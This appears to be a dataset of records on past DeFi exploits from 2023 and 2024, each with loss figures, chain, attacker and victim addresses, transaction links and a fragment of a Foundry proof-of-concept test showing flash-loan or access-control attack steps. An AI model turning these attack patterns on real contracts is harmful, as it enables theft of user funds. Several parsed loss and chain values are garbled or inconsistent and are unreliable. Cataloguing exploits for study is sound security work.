https://etherscan.io/tx/0x8b74995d1d61d3d7547575649136b8765acb22882960f0636941c44ec7bbe146
https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d
https://twitter.com/BlockSecTeam/status/1682356244299010049
$3.25M
8
high
Conic Exploit (2023-07)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$69K // Attacker : https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e // Vulnerable Contract : https://etherscan.io/address/0x8189afbe7b0e81dae735e...
exploit_poc
AzukiDAO
2023-07
AzukiDAO_exp.sol
null
127e1af9046f6f94
2026-01-07T10:59:16.510750
postmortems
ethereum
17,593,308
~$69K
69,000
https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e
null
https://etherscan.io/address/0x8189afbe7b0e81dae735ef027cd31371b3974feb
https://etherscan.io/tx/0x6233c9315dd3b6a6fcc7d653f4dca6c263e684a76b4ad3d93595e3b8e8714d34
null
null
true
true
false
medium
~$69K
unknown
function testExploit() public { deal(address(Bean), azukiDAOExploiter, 0); emit log_named_decimal_uint( "Attacker balance of Bean token before exploit", Bean.balanceOf(azukiDAOExploiter), Bean.decimals() ); // Arguments for the claim() function calls // Signature: sen...
true
~$69K
https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e
https://etherscan.io/address/0x8189afbe7b0e81dae735ef027cd31371b3974feb
https://etherscan.io/tx/0x6233c9315dd3b6a6fcc7d653f4dca6c263e684a76b4ad3d93595e3b8e8714d34
$69.0K
7.71
medium
AzukiDAO Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~51K USD$ // Attacker : https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a // Attack Contract : https://snowtrace.io/address/0x16a3c9e492dee1503f46d...
exploit_poc
Platypus02
2023-07
Platypus02_exp.sol
flash_loan
90c58fba4a879141
2026-01-07T10:59:16.510796
postmortems
polygon
32,470,736
~51K USD$
51,000
https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a
https://snowtrace.io/address/0x16a3c9e492dee1503f46dea84c52c6a0608f1ed8
https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b
https://snowtrace.io/tx/0x4b544e5ffb0420977dacb589a6fb83e25347e0685275a3327ee202449b3bfac6
null
https://twitter.com/peckshield/status/1678800450303164431
true
true
true
medium
~51K USD$
flash-loan
function testExploit() public { aaveV3.flashLoanSimple(address(this), address(USDC), 85_000 * 1e6, new bytes(0), 0); emit log_named_decimal_uint( "Attacker USDC balance after exploit", USDC.balanceOf(address(this)), USDC.decimals() ); }
true
~51K USD$
https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a
https://snowtrace.io/address/0x16a3c9e492dee1503f46dea84c52c6a0608f1ed8
https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b
https://snowtrace.io/tx/0x4b544e5ffb0420977dacb589a6fb83e25347e0685275a3327ee202449b3bfac6
https://twitter.com/peckshield/status/1678800450303164431
$51.0K
8.93
high
Platypus02 Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~165K USD$ // Attacker : https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985 // Attack Contract : https://etherscan.io/address/0xf466f9f431aea853040e...
exploit_poc
Civfund
2023-07
Civfund_exp.sol
access_control
01b9234cd11181e5
2026-01-07T10:59:16.510868
postmortems
ethereum
17,646,141
~165K USD$
165,000
https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985
https://etherscan.io/address/0xf466f9f431aea853040ef837626b1c59cc963ce2
https://etherscan.io/address/0x7caec5e4a3906d0919895d113f7ed9b3a0cbf826
https://etherscan.io/tx/0xc42fc0e22a0f60cc299be80eb0c0ddce83c21c14a3dddd8430628011c3e20d6b
null
null
true
true
true
high
~165K USD$
access-control
function testExploit() public { // Step 1. Call vulnerable contract function which have no access controll for (uint256 i; i < victims.length; ++i) { callVulnerableContract(); } emit log_named_decimal_uint( "Attacker USDT balance after exploit", USDT.balanceOf(ad...
true
~165K USD$
https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985
https://etherscan.io/address/0xf466f9f431aea853040ef837626b1c59cc963ce2
https://etherscan.io/address/0x7caec5e4a3906d0919895d113f7ed9b3a0cbf826
https://etherscan.io/tx/0xc42fc0e22a0f60cc299be80eb0c0ddce83c21c14a3dddd8430628011c3e20d6b
$165.0K
10
high
Civfund Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~110K USD$ // Attacker : https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050 // Attack Contract : https://bscscan.com/address/0xb31c7b7bdf69554345e47a...
exploit_poc
FFIST
2023-07
FFIST_exp.sol
null
19e4ade56729c83e
2026-01-07T10:59:16.510935
postmortems
bsc
30,113,117
~110K USD$
110,000
https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050
https://bscscan.com/address/0xb31c7b7bdf69554345e47a4393f53c332255c9fb
https://bscscan.com/address/0x80121da952a74c06adc1d7f85a237089b57af347
https://bscscan.com/tx/0x199c4b88cab6b4b495b9d91af98e746811dd8f82f43117c48205e6332db9f0e0
null
https://twitter.com/Phalcon_xyz/status/1681869807698984961
true
true
false
high
~110K USD$
unknown
false
~110K USD$
https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050
https://bscscan.com/address/0xb31c7b7bdf69554345e47a4393f53c332255c9fb
https://bscscan.com/address/0x80121da952a74c06adc1d7f85a237089b57af347
https://bscscan.com/tx/0x199c4b88cab6b4b495b9d91af98e746811dd8f82f43117c48205e6332db9f0e0
https://twitter.com/Phalcon_xyz/status/1681869807698984961
$110.0K
5.52
medium
FFIST Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~8K USD$ // Attacker : https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5 // Attack Contract : https://bscscan.com/address/0x9be508ce41ae5795e1ebc247...
exploit_poc
SUT
2023-07
SUT_exp.sol
flash_loan
585115a15cecd62f
2026-01-07T10:59:16.510978
postmortems
bsc
30,165,901
~8K USD$
8,000
https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5
https://bscscan.com/address/0x9be508ce41ae5795e1ebc247101c40da7d5742db
https://bscscan.com/address/0xf075c5c7ba59208c0b9c41afccd1f60da9ec9c37
https://bscscan.com/tx/0xfa1ece5381b9e2b2b83cb10faefde7632ca411bb38dd6bafe1f1140b1360f6ae
null
null
true
true
true
low
~8K USD$
flash-loan
function testExploit() public { // Start with 0 BNB deal(address(this), 0 ether); // Take 10 WBNB loan DPPOracle.flashLoan(10e18, 0, address(this), new bytes(1)); emit log_named_decimal_uint( "Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), WBNB....
true
~8K USD$
https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5
https://bscscan.com/address/0x9be508ce41ae5795e1ebc247101c40da7d5742db
https://bscscan.com/address/0xf075c5c7ba59208c0b9c41afccd1f60da9ec9c37
https://bscscan.com/tx/0xfa1ece5381b9e2b2b83cb10faefde7632ca411bb38dd6bafe1f1140b1360f6ae
$8.0K
8.85
high
SUT Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~400K USD$ // Attacker : https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467 // Attack Contract : https://optimistic.etherscan.io/address/...
exploit_poc
ArcadiaFi
2023-07
ArcadiaFi_exp.sol
flash_loan
ecd73db8a518479e
2026-01-07T10:59:16.511032
postmortems
ethereum
106,676,494
~400K USD$
400,000
https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467
https://optimistic.etherscan.io/address/0x01a4d9089c243ccaebe40aa224ad0cab573b83c6
https://optimistic.etherscan.io/address/0x13c0ef5f1996b4f119e9d6c32f5e23e8dc313109
https://optimistic.etherscan.io/tx/0xca7c1a0fde444e1a68a8c2b8ae3fb76ec384d1f7ae9a50d26f8bfdd37c7a0afe
https://arcadiafinance.medium.com/post-mortem-72e9d24a79b0
https://twitter.com/Phalcon_xyz/status/1678250590709899264
true
true
true
high
~400K USD$
flash-loan
false
~400K USD$
https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467
https://optimistic.etherscan.io/address/0x01a4d9089c243ccaebe40aa224ad0cab573b83c6
https://optimistic.etherscan.io/address/0x13c0ef5f1996b4f119e9d6c32f5e23e8dc313109
https://optimistic.etherscan.io/tx/0xca7c1a0fde444e1a68a8c2b8ae3fb76ec384d1f7ae9a50d26f8bfdd37c7a0afe
https://arcadiafinance.medium.com/post-mortem-72e9d24a79b0
https://twitter.com/Phalcon_xyz/status/1678250590709899264
$400.0K
8
high
ArcadiaFi Exploit (2023-07)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : $230,000 // Attacker : https://etherscan.io/address/0x02DBE46169fDf6555F2A125eEe3dce49703b13f5 // Attack Contract : https://etherscan.io/address/0x4095F064B8d3c3548A3bebfd0Bbfd04750E30077 // Vulnerable...
exploit_poc
MorphoBlue
2024-10
MorphoBlue_exp.sol
flash_loan
30e2cf4d29e8aac6
2026-01-07T10:59:16.511115
postmortems
ethereum
null
$230,000
230
https://etherscan.io/address/0x02DBE46169fDf6555F2A125eEe3dce49703b13f5
https://etherscan.io/address/0x4095F064B8d3c3548A3bebfd0Bbfd04750E30077
https://etherscan.io/address/0xBBBBBbbBBb9cC5e90e3b3Af64bdAF62C37EEFFCb
https://etherscan.io/tx/0x256979ae169abb7fbbbbc14188742f4b9debf48b48ad5b5207cadcc99ccb493b
null
https://x.com/omeragoldberg/status/1845515843787960661
true
true
true
low
$230,000
flash-loan
function testExploit() public balanceLog { // Initiate a flash loan of PAXG from the Uniswap V2 pair IUniswapV2Pair(PAXG_WETH_V2_PAIR).swap(PAXG_FLASHLOAN_AMOUNT, 0, address(this), new bytes(100)); //At the end we swap any PAXG if remaining to USDC uint256 paxgBal = TokenHelper.getTokenB...
true
$230,000
https://etherscan.io/address/0x02DBE46169fDf6555F2A125eEe3dce49703b13f5
https://etherscan.io/address/0x4095F064B8d3c3548A3bebfd0Bbfd04750E30077
https://etherscan.io/address/0xBBBBBbbBBb9cC5e90e3b3Af64bdAF62C37EEFFCb
https://etherscan.io/tx/0x256979ae169abb7fbbbbc14188742f4b9debf48b48ad5b5207cadcc99ccb493b
https://x.com/omeragoldberg/status/1845515843787960661
$230
10
high
MorphoBlue Exploit (2024-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 34.88 BNB (~$20K USD) // Attacker : https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 // Attack Contract : https://bscscan.com/address/0x8408497c18882...
exploit_poc
AIZPTToken
2024-10
AIZPTToken_exp.sol
null
06f624ea7e20687b
2026-01-07T10:59:16.511201
postmortems
bsc
42,846,998
34.88 BNB (~$20K USD)
34,880,000,000
https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
https://bscscan.com/address/0x8408497c18882bfb61be9204cfff530f4ee18320
https://bscscan.com/address/0xbe779d420b7d573c08eee226b9958737b6218888
https://bscscan.com/tx/0x5e694707337cca979d18f9e45f40e81d6ca341ed342f1377f563e779a746460d
null
null
true
false
false
critical
34.88 BNB (~$20K USD)
unknown
function testPoC() public { vm.startPrank(attacker); AttackerC attackerC = new AttackerC(); vm.label(address(attackerC), "attackerC"); attackerC.attack(); console.log("Final balance in wBNB :", IERC20(weth).balanceOf(attacker)); } } contract AttackerC {
true
34.88 BNB (~$20K USD)
https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
https://bscscan.com/address/0x8408497c18882bfb61be9204cfff530f4ee18320
https://bscscan.com/address/0xbe779d420b7d573c08eee226b9958737b6218888
https://bscscan.com/tx/0x5e694707337cca979d18f9e45f40e81d6ca341ed342f1377f563e779a746460d
$34880.00M
7.16
medium
AIZPTToken Exploit (2024-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : $14,773.35 // Attacker : https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a // Attack Contract : https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0 // Vulnerab...
exploit_poc
Erc20transfer
2024-10
Erc20transfer_exp.sol
null
6add43aadcf846d8
2026-01-07T10:59:16.511243
postmortems
ethereum
null
$14,773.35
14
https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a
https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0
https://etherscan.io/address/0x43dc865e916914fd93540461fde124484fbf8faa
https://etherscan.io/tx/0x7f2540af4a1f7b0172a46f5539ebf943dd5418422e4faa8150d3ae5337e92172
https://x.com/d23e_AG/status/1849064161017225645
https://x.com/d23e_AG/status/1849064161017225645
true
true
false
low
$14,773.35
unknown
function testExploit() public balanceLog { I(0x43Dc865E916914FD93540461FdE124484FBf8fAa).erc20TransferFrom( 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, address(this), 0x3DADf003AFCC96d404041D8aE711B94F8C68c6a5, 0 ); }
true
$14,773.35
https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a
https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0
https://etherscan.io/address/0x43dc865e916914fd93540461fde124484fbf8faa
https://etherscan.io/tx/0x7f2540af4a1f7b0172a46f5539ebf943dd5418422e4faa8150d3ae5337e92172
https://x.com/d23e_AG/status/1849064161017225645
https://x.com/d23e_AG/status/1849064161017225645
$14
6.81
medium
Erc20transfer Exploit (2024-10)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 1 USDC, 125795.6 cUSDC, 0,0067 WBTC, 2.25 WETH (~$130K USD) // Attacker : https://arbiscan.io/address/0x8a0dfb61cad29168e1067f6b23553035d83fcfb2 // Attack Contract : https...
exploit_poc
LavaLending
2024-10
LavaLending_exp.sol
flash_loan
78fc1eab69666b17
2026-01-07T10:59:16.511294
postmortems
arbitrum
259,645,908
1 USDC, 125795.6 cUSDC, 0,0067 WBTC, 2.25 WETH (~$130K USD)
1
https://arbiscan.io/address/0x8a0dfb61cad29168e1067f6b23553035d83fcfb2
https://arbiscan.io/address/0x69fa61eb4dc4e07263d401b01ed1cfceb599dab8#code
https://arbiscan.io/address/0x6700b021a8bcfae25a2493d16d7078c928c13151
https://arbiscan.io/tx/0xb5cfa4ae4d6e459ba285fec7f31caf8885e2285a0b4ff62f66b43e280c947216
null
null
true
false
true
low
1 USDC, 125795.6 cUSDC, 0,0067 WBTC, 2.25 WETH (~$130K USD)
flash-loan
function testPoC() public { vm.startPrank(attacker); AttackerC attackerC = new AttackerC(); vm.label(address(attackerC), "attackerC"); attackerC.attack(); console.log("Final balance in usdc :", IERC20(usdc).balanceOf(attacker)); console.log("Final balance in cUSDC:", IE...
true
1 USDC, 125795.6 cUSDC, 0,0067 WBTC, 2.25 WETH (~$130K USD)
https://arbiscan.io/address/0x8a0dfb61cad29168e1067f6b23553035d83fcfb2
https://arbiscan.io/address/0x69fa61eb4dc4e07263d401b01ed1cfceb599dab8#code
https://arbiscan.io/address/0x6700b021a8bcfae25a2493d16d7078c928c13151
https://arbiscan.io/tx/0xb5cfa4ae4d6e459ba285fec7f31caf8885e2285a0b4ff62f66b43e280c947216
$1
10
high
LavaLending Exploit (2024-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~249 ETH (~$600K USD) // Attacker : 0x493c5655D40B051a64bc88A6af21D73d3A9B72A2 (Shezmu Attacker 3) // Attack Contract : https://etherscan.io/address/0x991493900674b10bdf54...
exploit_poc
SASHAToken
2024-10
SASHAToken_exp.sol
null
1ebced9a8cd49a48
2026-01-07T10:59:16.511395
postmortems
ethereum
20,905,302
~249 ETH (~$600K USD)
249
null
https://etherscan.io/address/0x991493900674b10bdf54bdfe95b4e043257798cf
null
https://app.blocksec.com/explorer/tx/eth/0xd9fdc7d03eec28fc2453c5fa68eff82d4c297f436a6a5470c54ca3aecd2db17e
null
null
true
true
false
low
~249 ETH (~$600K USD)
unknown
function testExploit() public { vm.startPrank(attacker); SASHAToken_AttackContract attackC = new SASHAToken_AttackContract(); payable(address(attackC)).transfer(0.08 ether); attackC.attack(); // Simulate withdraw attackC.withdraw(); vm.stopPrank(); co...
true
~249 ETH (~$600K USD)
https://etherscan.io/address/0x991493900674b10bdf54bdfe95b4e043257798cf
https://app.blocksec.com/explorer/tx/eth/0xd9fdc7d03eec28fc2453c5fa68eff82d4c297f436a6a5470c54ca3aecd2db17e
$249
7.08
medium
SASHAToken Exploit (2024-10)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 8.45 ETH (~$20K USD) // Attacker : https://etherscan.io/address/0x81f48a87ec44208c691f870b9d400d9c13111e2e // Attack Contract : https://etherscan.io/address/0x9776c0abe8ae...
exploit_poc
FireToken
2024-10
FireToken_exp.sol
flash_loan
472fca184941c8cb
2026-01-07T10:59:16.511446
postmortems
ethereum
20,869,375
8.45 ETH (~$20K USD)
8.45
https://etherscan.io/address/0x81f48a87ec44208c691f870b9d400d9c13111e2e
https://etherscan.io/address/0x9776c0abe8ae3c9ca958875128f1ae1d5afafcb8
https://etherscan.io/address/0x18775475f50557b96C63E8bbf7D75bFeB412082D
https://etherscan.io/tx/0xd20b3b31a682322eb0698ecd67a6d8a040ccea653ba429ec73e3584fa176ff2b
null
null
true
false
true
low
8.45 ETH (~$20K USD)
flash-loan
function testPoC() public { vm.startPrank(attacker); AttackerC attackerC = new AttackerC(); vm.label(address(attackerC), "attackerC"); attackerC.attack(); console.log("Final balance in WETH:", attacker.balance); } } contract AttackerC {
true
8.45 ETH (~$20K USD)
https://etherscan.io/address/0x81f48a87ec44208c691f870b9d400d9c13111e2e
https://etherscan.io/address/0x9776c0abe8ae3c9ca958875128f1ae1d5afafcb8
https://etherscan.io/address/0x18775475f50557b96C63E8bbf7D75bFeB412082D
https://etherscan.io/tx/0xd20b3b31a682322eb0698ecd67a6d8a040ccea653ba429ec73e3584fa176ff2b
$8
9.45
high
FireToken Exploit (2024-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // reason : price manipulation,mintv2 use wbnb-usdt pair price to mint Token // guy : https://x.com/TenArmorAlert/status/1844241843518951451 // tx : https://app.blocksec.com/explorer/tx/bsc/0...
exploit_poc
HYDT
2024-10
HYDT_exp.sol
null
36cf4736494f7e1b
2026-01-07T10:59:16.511502
postmortems
unknown
42,985,310
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.74
low
HYDT Exploit (2024-10)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 547.18 BNB (~$312K USD) // Attacker : https://bscscan.com/address/0xfeb19ae8c0448f25de43a3afcb7b29c9cef6eff6 // Attack Contract : https://bscscan.com/address/0x3f32c7cfb0a...
exploit_poc
P719Token
2024-10
P719Token_exp.sol
null
5a463ec6bc9261a2
2026-01-07T10:59:16.511569
postmortems
bsc
43,023,423
547.18 BNB (~$312K USD)
547,179,999,999.99994
https://bscscan.com/address/0xfeb19ae8c0448f25de43a3afcb7b29c9cef6eff6
https://bscscan.com/address/0x3f32c7cfb0a78ddea80a2384ceb4633099cbdc98
https://bscscan.com/token/0x6beee2b57b064eac5f432fc19009e3e78734eabc
https://bscscan.com/tx/0x9afcac8e82180fa5b2f346ca66cf6eb343cd1da5a2cd1b5117eb7eaaebe953b3
null
null
true
false
false
critical
547.18 BNB (~$312K USD)
unknown
function testPoC() public { vm.startPrank(attacker); AttackerC attackerC = new AttackerC(); vm.label(address(attackerC), "attackerC"); // First the attacker create a owned token myToken = new MyToken(); // Second create a pair in uniswap with WBNB vm.deal(attack...
true
547.18 BNB (~$312K USD)
https://bscscan.com/address/0xfeb19ae8c0448f25de43a3afcb7b29c9cef6eff6
https://bscscan.com/address/0x3f32c7cfb0a78ddea80a2384ceb4633099cbdc98
https://bscscan.com/token/0x6beee2b57b064eac5f432fc19009e3e78734eabc
https://bscscan.com/tx/0x9afcac8e82180fa5b2f346ca66cf6eb343cd1da5a2cd1b5117eb7eaaebe953b3
$547180.00M
9
high
P719Token Exploit (2024-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // reason : flashloan will burn the token, but not check the token is freezed or not // guy : https://x.com/TenArmorAlert/status/1848403791881900130 // tx : https://app.blocksec.com/explorer/...
exploit_poc
VISTA
2024-10
VISTA_exp.sol
flash_loan
655a88310e0df3c4
2026-01-07T10:59:16.511634
postmortems
unknown
43,305,237
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
false
Unknown
3.02
low
VISTA Exploit (2024-10)
false
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 131k // Attacker : https://etherscan.io/address/0xa60fae100d9c3d015c9cd7107f95cbacf58a1cbd // Attack Contract : // Vulnerable Contract : // Attack Tx : https://app.blocksec.com/explorer/tx/eth/0x1b4730e715286...
exploit_poc
BUBAI
2024-10
BUBAI_exp.sol
null
3b25408284f19d51
2026-01-07T10:59:16.511688
postmortems
ethereum
21,074,245
131k
131,000
https://etherscan.io/address/0xa60fae100d9c3d015c9cd7107f95cbacf58a1cbd
null
null
https://app.blocksec.com/explorer/tx/eth/0x1b4730e715286862042def956d5aaa6a53203ee02b97ea913de73fa462e48f90?line=0
https://x.com/TenArmorAlert/status/1851445795918118927
https://x.com/TenArmorAlert/status/1851445795918118927
true
true
false
high
131k
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); vm.stopPrank(); vm.startPrank(UniswapV2Pair); IORAAI(ORAAI).approve(address(...
true
131k
https://etherscan.io/address/0xa60fae100d9c3d015c9cd7107f95cbacf58a1cbd
https://app.blocksec.com/explorer/tx/eth/0x1b4730e715286862042def956d5aaa6a53203ee02b97ea913de73fa462e48f90?line=0
https://x.com/TenArmorAlert/status/1851445795918118927
https://x.com/TenArmorAlert/status/1851445795918118927
$131.0K
6.68
medium
BUBAI Exploit (2024-10)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~100K USD$ // Attacker : https://bscscan.com/address/0xee6764ac7aa45ed52482e4320906fd75615ba1d1 // Attack Contract : https://bscscan.com/address/0x9a6b926281b0c7bc4f775e...
exploit_poc
BabyDogeCoin02
2023-06
BabyDogeCoin02_exp.sol
flash_loan
602aaabbb933e909
2026-01-07T10:59:16.511740
postmortems
bsc
29,295,010
~100K USD$
100,000
https://bscscan.com/address/0xee6764ac7aa45ed52482e4320906fd75615ba1d1
https://bscscan.com/address/0x9a6b926281b0c7bc4f775e81f42b13eda9c1c98e
https://bscscan.com/address/0xc748673057861a797275CD8A068AbB95A902e8de
https://bscscan.com/tx/0xbaf3e4841614eca5480c63662b41cd058ee5c85dc69198b29e7ab63b84bc866c
null
https://twitter.com/hexagate_/status/1671517819840745475
true
true
true
high
~100K USD$
flash-loan
function testExploit() public { init(); AddBabyDogeCoinWBNBLiquidity(); exploit(); emit log_named_decimal_uint( "Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), WBNB.decimals() ); }
true
~100K USD$
https://bscscan.com/address/0xee6764ac7aa45ed52482e4320906fd75615ba1d1
https://bscscan.com/address/0x9a6b926281b0c7bc4f775e81f42b13eda9c1c98e
https://bscscan.com/address/0xc748673057861a797275CD8A068AbB95A902e8de
https://bscscan.com/tx/0xbaf3e4841614eca5480c63662b41cd058ee5c85dc69198b29e7ab63b84bc866c
https://twitter.com/hexagate_/status/1671517819840745475
$100.0K
10
high
BabyDogeCoin02 Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~13 $ETH // Attacker : https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3 // Attack Contract : https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3 // Vulnerable Contract : https://bscscan.c...
exploit_poc
STRAC
2023-06
STRAC_exp.sol
null
a5ef48f3bcaa0b27
2026-01-07T10:59:16.511815
postmortems
bsc
29,474,566
~13 $ETH
13
https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3
https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3
https://bscscan.com/address/0x1f90bdeb5674833868ee9b36707b929024e7a513
https://bscscan.com/tx/0x1147b3c0f3ebdd524c4e58430bb736eba9f7fa522158f5ad81eb3e2394b466d0
null
null
true
false
false
low
~13 $ETH
unknown
function testExploit() public { STRAC.approve(address(PancakeRouter), type(uint256).max); emit log_named_decimal_uint("Attacker ETH balance before attack", ETH.balanceOf(address(this)), 18); Contract_0x1f90.call( abi.encodeWithSelector(bytes4(0x4a75084c), address(this), STRAC, STRAC....
true
~13 $ETH
https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3
https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3
https://bscscan.com/address/0x1f90bdeb5674833868ee9b36707b929024e7a513
https://bscscan.com/tx/0x1147b3c0f3ebdd524c4e58430bb736eba9f7fa522158f5ad81eb3e2394b466d0
$13
7.21
medium
STRAC Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~36K USD$ (LEVUSDC) + ~69K USD$ (DEPUSDT) // Vulnerable Proxy DEPUSDT : https://etherscan.io/address/0x7b190a928aa76eece5cb3e0f6b3bdb24fcdd9b4f // Vulnerable Proxy LEVUS...
exploit_poc
DEPUSDT_LEVUSDC
2023-06
DEPUSDT_LEVUSDC_exp.sol
access_control
88e7e01d05ef0351
2026-01-07T10:59:16.511861
postmortems
ethereum
17,484,161
~36K USD$ (LEVUSDC) + ~69K USD$ (DEPUSDT)
36,000
null
null
null
null
null
null
true
true
true
medium
~36K USD$ (LEVUSDC) + ~69K USD$ (DEPUSDT)
access-control
function testApprove() public { // No access control. Thanks to this, attacker obtained authorization to transfer funds ProxyDEPUSDT.approveToken(address(DEPUSDT), address(this), type(uint256).max); DEPUSDT.transferFrom(address(ProxyDEPUSDT), address(this), DEPUSDT.balanceOf(address(ProxyDEPUSD...
true
~36K USD$ (LEVUSDC) + ~69K USD$ (DEPUSDT)
$36.0K
6.28
medium
DEPUSDT_LEVUSDC Exploit (2023-06)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~76K USD$ // Attacker - https://bscscan.com/address/0x2525c811ecf22fc5fcde03c67112d34e97da6079 // Attack contract - https://bscscan.com/address/0x1e2a251b29e84e1d6d762c7...
exploit_poc
Cellframe
2023-06
Cellframe_exp.sol
flash_loan
2a79592180895132
2026-01-07T10:59:16.511906
postmortems
bsc
28,708,273
~76K USD$
76,000
null
null
null
https://bscscan.com/tx/0x943c2a5f89bc0c17f3fe1520ec6215ed8c6b897ce7f22f1b207fea3f79ae09a6
null
null
true
true
true
medium
~76K USD$
flash-loan
function testExploit() public { deal(address(WBNB), address(this), 0.1 ether); emit log_named_decimal_uint( "Attacker WBNB balance before attack", WBNB.balanceOf(address(this)), WBNB.decimals() ); // Preparation. Pre-attack transaction WBNB.approve(address(Router), t...
true
~76K USD$
https://bscscan.com/tx/0x943c2a5f89bc0c17f3fe1520ec6215ed8c6b897ce7f22f1b207fea3f79ae09a6
$76.0K
9
high
Cellframe Exploit (2023-06)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~370K USD$ // Attacker : https://arbiscan.io/address/0xdb73eb484e7dea3785520d750eabef50a9b9ab33 // Attack Contracts : https://arbiscan.io/address/0x05a1b877330c168451f08...
